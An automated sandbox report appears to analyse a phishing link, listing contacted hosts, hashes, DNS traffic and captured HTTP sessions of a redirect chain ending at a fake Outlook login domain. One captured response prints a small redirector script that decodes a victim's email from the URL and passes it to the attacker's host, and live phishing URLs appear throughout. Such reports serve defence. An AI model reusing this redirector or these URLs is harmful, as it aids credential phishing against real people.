https://js.monitor.azure.com/scripts/c/ms.analytics-web-2.min.js	chromecache_122.2.dr	false	high
http://github.com/requirejs/almond/LICENSE	chromecache_133.2.dr, chromecache_114.2.dr	false	high
http://www.json.org/json2.js	chromecache_122.2.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.107.246.40	part-0012.t-0009.t-msedge.net	United States	8068	MICROSOFT-CORP-MSN-AS-BLOCKUS	false
31.170.163.25	wordpressprofissional.com.br	United States	47583	AS-HOSTINGERLT	false
3.136.74.202	click.pstmrk.it	United States	16509	AMAZON-02US	false
2.58.15.240	r6duftx9uh6.scrdata-doc.cfd	Czech Republic	33438	HIGHWINDS2US	false
104.244.42.197	t.co	United States	13414	TWITTERUS	false
142.250.64.196	www.google.com	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
52.96.28.178	LYH-efz.ms-acdc.office.com	United States	8075	MICROSOFT-CORP-MSN-AS-BLOCKUS	false

Private

IP
192.168.2.5

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1432103
Start date and time:	2024-04-26 13:19:58 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://click.pstmrk.it/3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3Yffz
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal80.phis.win@23/111@41/9
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Browse: https://r6duftx9uh6.scrdata-doc.cfd/owa/ Browse: https://go.microsoft.com/fwlink/p/?LinkId=780766

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.189.131, 142.250.217.174, 142.251.162.84, 34.104.35.123, 72.21.81.240, 192.229.211.108, 20.166.126.56, 40.126.28.14, 40.126.28.20, 40.126.28.18, 40.126.28.22, 40.126.28.23, 40.126.28.12, 40.126.7.35, 40.126.28.11, 172.217.15.202, 142.250.189.138, 142.250.217.202, 142.250.217.234, 192.178.50.42, 142.251.35.234, 172.217.165.202, 142.250.64.234, 142.250.217.170, 192.178.50.74, 23.221.212.6, 23.221.212.30, 23.221.212.43, 23.221.212.29, 23.221.212.35, 23.221.212.41, 23.221.212.27, 23.221.212.7, 23.221.212.5, 152.199.4.33, 23.196.177.129, 23.10.108.77, 184.28.75.171, 184.28.75.154, 192.178.50.67, 23.213.225.163, 184.28.75.168, 23.196.178.151
Excluded domains from analysis (whitelisted): assets.onestore.ms.edgekey.net, slscr.update.microsoft.com, e13678.dscb.akamaiedge.net, clientservices.googleapis.com, i.s-microsoft.com.edgekey.net, a1449.dscg2.akamai.net, www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net, e11290.dspg.akamaiedge.net, www.microsoft.com-c-3.edgekey.net, clients2.google.com, mscomajax.vo.msecnd.net, go.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, update.googleapis.com, img-prod-cms-rt-microsoft-com.akamaized.net, e10583.dspg.akamaiedge.net, e40491.dscg.akamaiedge.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, cs22.wpc.v0cdn.net, cmspreview2.corp.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, aadcdn.msauth.net, assets.onestore.ms.akadns.net, firstparty-azurefd-prod.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.micros
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Apr 26 10:20:54 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.985718134756066
Encrypted:	false
SSDEEP:	48:8ed1TdhBH60idAKZdA19ehwiZUklqehay+3:8QjoSZy
MD5:	CDDBDC660D89320195662A314DF215E9
SHA1:	20527A7C8A717F0B79C38CF68E71D13832B61769
SHA-256:	B9D369263FA1C6BB07A314BD1DFB519AE9B93611EF1EB045056035C09C9F22FB
SHA-512:	61D8307395347BB4E0DFA246E3002BEF226CAC6D02F00837B81BD8062E179702FAA7BB9C5F6479B7D8D68E9F22915ACAE7F5B5AC99972039017D25D60C0B3F83
Malicious:	false
Reputation:	low
Preview:	L..................F.@.. ...$+.,...........N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.Z....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.Z....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.Z....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X.Z..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X.Z...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............Yj......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 26, 2024 13:20:53.318312883 CEST	53	58527	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:53.320470095 CEST	53	54164	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:53.556050062 CEST	60387	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:20:53.556200981 CEST	58071	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:20:53.681047916 CEST	53	58071	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:53.681261063 CEST	53	60387	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:54.335159063 CEST	53	65413	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:54.447247982 CEST	58559	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:20:54.447375059 CEST	55051	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:20:54.572555065 CEST	53	58559	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:54.588213921 CEST	53	55051	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:55.740369081 CEST	60239	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:20:55.740959883 CEST	56979	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:20:55.867060900 CEST	53	56979	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:55.867176056 CEST	53	60239	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:56.467468977 CEST	63067	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:20:56.467663050 CEST	53063	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:20:56.592722893 CEST	53	53063	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:56.592768908 CEST	53	63067	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:57.328387022 CEST	50249	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:20:57.328568935 CEST	65323	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:20:57.743546963 CEST	53	65323	1.1.1.1	192.168.2.5
Apr 26, 2024 13:20:58.262913942 CEST	53	50249	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:00.622648954 CEST	54323	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:00.971859932 CEST	53	54323	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:01.376072884 CEST	58552	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:01.472179890 CEST	55877	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:01.580168009 CEST	53	58552	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:01.719455004 CEST	53	55877	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:05.147880077 CEST	61324	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:05.148139000 CEST	58622	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:05.278932095 CEST	53	61324	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:05.279185057 CEST	53	58622	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:14.305341005 CEST	53	62820	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:15.488850117 CEST	55108	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:15.488996029 CEST	58076	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:15.616806984 CEST	53	55108	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:15.617114067 CEST	53	58076	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:31.261360884 CEST	57811	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:31.261662960 CEST	50241	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:31.386105061 CEST	53	50241	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:31.386243105 CEST	53	57811	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:34.092081070 CEST	53	53525	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:34.269562960 CEST	53	63108	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:34.325439930 CEST	62080	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:34.325819016 CEST	59650	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:35.117430925 CEST	51266	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:35.117686987 CEST	56981	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:35.248306036 CEST	53	56981	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:35.249615908 CEST	53	51266	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:46.179445028 CEST	49884	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:46.179714918 CEST	49250	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:46.181680918 CEST	55844	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:46.181830883 CEST	61764	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:46.182467937 CEST	57554	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:46.182667017 CEST	50985	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:49.572987080 CEST	53	50459	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:49.832353115 CEST	60129	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:49.832612991 CEST	62234	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:50.343504906 CEST	62967	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:50.343625069 CEST	61334	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:21:52.578789949 CEST	53	56350	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:52.579154015 CEST	53	61224	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:52.742130995 CEST	53	65379	1.1.1.1	192.168.2.5
Apr 26, 2024 13:21:58.095700026 CEST	53	52279	1.1.1.1	192.168.2.5
Apr 26, 2024 13:22:05.693234921 CEST	61972	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:22:05.693588972 CEST	51376	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:22:05.695368052 CEST	65328	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:22:05.695751905 CEST	53004	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:22:05.696172953 CEST	55298	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:22:05.696485996 CEST	64599	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:22:07.969240904 CEST	65325	53	192.168.2.5	1.1.1.1
Apr 26, 2024 13:22:07.969362020 CEST	55673	53	192.168.2.5	1.1.1.1

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 26, 2024 13:20:55.867163897 CEST	192.168.2.5	1.1.1.1	c23b	(Port unreachable)	Destination Unreachable
Apr 26, 2024 13:21:00.971949100 CEST	192.168.2.5	1.1.1.1	c203	(Port unreachable)	Destination Unreachable
Apr 26, 2024 13:21:01.719536066 CEST	192.168.2.5	1.1.1.1	c224	(Port unreachable)	Destination Unreachable
Apr 26, 2024 13:21:50.061346054 CEST	192.168.2.5	1.1.1.1	c275	(Port unreachable)	Destination Unreachable
Apr 26, 2024 13:22:05.943093061 CEST	192.168.2.5	1.1.1.1	c2a2	(Port unreachable)	Destination Unreachable

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:20:56 UTC	743	OUT	GET /3s/t.co%2FRieqFTtqmt/gMTC/7_W0AQ/AQ/880c85de-cc11-4181-9f68-0f08d9f1e222/1/rCUNy3Yffz HTTP/1.1 Host: click.pstmrk.it Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 11:20:56 UTC	192	IN	HTTP/1.1 302 Found Server: awselb/2.0 Date: Fri, 26 Apr 2024 11:20:56 GMT Content-Type: application/octet-stream Content-Length: 0 Connection: close Location: https://t.co/RieqFTtqmt

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:20:56 UTC	657	OUT	GET /RieqFTtqmt HTTP/1.1 Host: t.co Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 11:20:57 UTC	766	IN	HTTP/1.1 200 OK date: Fri, 26 Apr 2024 11:20:56 GMT perf: 7402827104 vary: Origin server: tsa_b expires: Fri, 26 Apr 2024 11:25:57 GMT set-cookie: muc=201fda1f-d085-4c44-8d8b-2e51b187e402; Max-Age=63072000; Expires=Sun, 26 Apr 2026 11:20:57 GMT; Domain=t.co; Secure; SameSite=None set-cookie: muc_ads=201fda1f-d085-4c44-8d8b-2e51b187e402; Max-Age=63072000; Expires=Sun, 26 Apr 2026 11:20:57 GMT; Path=/; Domain=t.co; Secure; SameSite=None content-type: text/html; charset=utf-8 cache-control: private,max-age=300 content-length: 364 x-transaction-id: e016b0cd61a541b5 x-xss-protection: 0 strict-transport-security: max-age=0 x-response-time: 96 x-connection-hash: dec6d77a392fbf1ae5738195456a77539f92b6db28e0344ac50b8a3442c2119e connection: close
2024-04-26 11:20:57 UTC	364	IN	Data Raw: 3c 68 65 61 64 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 4d 45 54 41 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 70 72 6f 66 69 73 73 69 6f 6e 61 6c 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 4f 78 5a 55 30 65 38 66 47 54 48 74 37 4e 54 66 72 61 66 71 2f 22 3e 3c 2f 6e 6f 73 63 72 69 70 74 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 6f 72 64 70 72 65 73 73 70 72 6f 66 69 73 73 69 6f 6e 61 6c 2e 63 6f 6d 2e 62 72 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 4f 78 5a 55 30 65 38 66 47 54 48 74 37 4e 54 66 72 61 66 71 2f 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 70 65 6e 65 72 20 3d 20 Data Ascii: <head><noscript><META http-equiv="refresh" content="0;URL=https://wordpressprofissional.com.br/wp-content/OxZU0e8fGTHt7NTfrafq/"></noscript><title>https://wordpressprofissional.com.br/wp-content/OxZU0e8fGTHt7NTfrafq/</title></head><script>window.opener =

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:01 UTC	713	OUT	GET /wp-content/OxZU0e8fGTHt7NTfrafq/ HTTP/1.1 Host: wordpressprofissional.com.br Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://t.co/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 11:21:01 UTC	516	IN	HTTP/1.1 200 OK Connection: close x-powered-by: PHP/8.2.13 content-type: text/html; charset=UTF-8 content-length: 214 date: Fri, 26 Apr 2024 11:21:01 GMT server: LiteSpeed strict-transport-security: max-age=31536000; includeSubDomains; preload x-xss-protection: 1; mode=block x-content-type-options: nosniff vary: User-Agent alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-04-26 11:21:01 UTC	214	IN	Data Raw: 3c 73 63 72 69 70 74 3e 20 0a 20 0a 76 61 72 20 65 6d 61 69 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 28 31 29 3b 76 61 72 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 20 3d 20 61 74 6f 62 28 65 6d 61 69 6c 29 3b 20 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 27 68 74 74 70 73 3a 2f 2f 73 65 63 75 72 2d 64 6f 63 2e 6f 6e 6c 69 6e 65 2f 3f 68 6a 68 6d 78 62 6f 72 26 71 72 63 3d 27 20 2b 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 3b 20 7d 29 3b 20 0a 3c 2f 73 63 72 69 70 74 3e Data Ascii: <script> var email = window.location.hash.substr(1);var decodedString = atob(email); window.setTimeout(function() {window.location.href = 'https://secur-doc.online/?hjhmxbor&qrc=' + decodedString; }); </script>

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:01 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-26 11:21:01 UTC	466	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (chd/0712) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-eus-z1 Cache-Control: public, max-age=70967 Date: Fri, 26 Apr 2024 11:21:01 GMT Connection: close X-CID: 2

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:02 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-04-26 11:21:02 UTC	530	IN	HTTP/1.1 200 OK Last-Modified: Tue, 16 May 2017 22:58:00 GMT ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Content-Type: application/octet-stream ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json X-Azure-Ref: 0DMGnYgAAAACXaXykPZuVRq4aV6pCkeO8U0pDRURHRTAzMTgAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm Cache-Control: public, max-age=70932 Date: Fri, 26 Apr 2024 11:21:02 GMT Content-Length: 55 Connection: close X-CID: 2
2024-04-26 11:21:02 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:03 UTC	707	OUT	GET /?hjhmxbor&qrc= HTTP/1.1 Host: secur-doc.online Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://wordpressprofissional.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 11:21:04 UTC	606	IN	HTTP/1.1 302 Found Set-Cookie: qPdM=4aRRMNgQQ48G; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; path=/; samesite=none; secure; httponly location: https://r6duftx9uh6.scrdata-doc.cfd?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3I2ZHVmdHg5dWg2LnNjcmRhdGEtZG9jLmNmZCIsImRvbWFpbiI6InI2ZHVmdHg5dWg2LnNjcmRhdGEtZG9jLmNmZCIsImtleSI6IjRhUlJNTmdRUTQ4RyIsInFyYyI6bnVsbCwiaWF0IjoxNzE0MTMwNDY0LCJleHAiOjE3MTQxMzA1ODR9.H5RlzzQftBFmXt14y-ibpfKcNBoPeazRovF59Sczzxc Date: Fri, 26 Apr 2024 11:21:04 GMT Connection: close Transfer-Encoding: chunked
2024-04-26 11:21:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:05 UTC	994	OUT	GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3I2ZHVmdHg5dWg2LnNjcmRhdGEtZG9jLmNmZCIsImRvbWFpbiI6InI2ZHVmdHg5dWg2LnNjcmRhdGEtZG9jLmNmZCIsImtleSI6IjRhUlJNTmdRUTQ4RyIsInFyYyI6bnVsbCwiaWF0IjoxNzE0MTMwNDY0LCJleHAiOjE3MTQxMzA1ODR9.H5RlzzQftBFmXt14y-ibpfKcNBoPeazRovF59Sczzxc HTTP/1.1 Host: r6duftx9uh6.scrdata-doc.cfd Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://wordpressprofissional.com.br/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-04-26 11:21:06 UTC	282	IN	HTTP/1.1 302 Found Set-Cookie: qPdM=4aRRMNgQQ48G; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=VX_p9ZlQxDGH45hp-am1FhGFA2s; path=/; samesite=none; secure; httponly location: / Date: Fri, 26 Apr 2024 11:21:06 GMT Connection: close Transfer-Encoding: chunked
2024-04-26 11:21:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-04-26 11:21:06 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=TtzcNWtAezK1OOG&MD=nko9pdNz HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-04-26 11:21:06 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: bec472aa-9b58-4a56-9f6e-e9a46dbb0de0 MS-RequestId: 61c41969-4d3a-447e-af14-8d319bfd46b4 MS-CV: vyhFPUbkSU6Qgp2s.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 26 Apr 2024 11:21:05 GMT Connection: close Content-Length: 24490
2024-04-26 11:21:06 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
